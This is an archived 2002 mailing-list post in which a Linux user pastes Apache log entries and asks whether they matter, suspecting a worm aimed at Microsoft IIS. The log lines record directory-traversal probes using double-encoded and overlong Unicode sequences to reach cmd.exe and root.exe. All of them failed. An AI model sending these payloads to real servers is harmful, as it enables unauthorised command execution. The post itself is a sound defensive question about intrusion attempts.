"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276

Top Page
This message is part of the following thread:
Mthe complete thread tree sorted by date
M 
Tyler Hall at ->
Attachments:
Message as email
+ (text/plain)
Delete this message
Reply to this message
Author: Guy Chouinard Jr
Date:  
Subject: "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
I just noticed this on my Apache server log.

Is this anything I should be concerned about ?

If I understand correctly what I've read is this is
a worm that exploits MS IIS vulnerabilities.


209.74.14.140 - - [21/Jan/2002:09:38:58 -0700] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 276

209.74.14.140 - - [21/Jan/2002:09:38:58 -0700] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 274

209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284

209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284

209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315

209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315

209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331

209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281

209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281

209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

209.74.14.140 - - [21/Jan/2002:09:39:02 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298




--
Guy Chouinard Jr
http://linuxbytes.net.dhis.org/index.php3

This message was posted to the following mailing lists:
Plug Discuss
Mailing List Info | Nearby Messages		<-DHCP woes (still)"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276->
Some Mailing List Archive administrated by UnconfiguredLurker (version 2.3)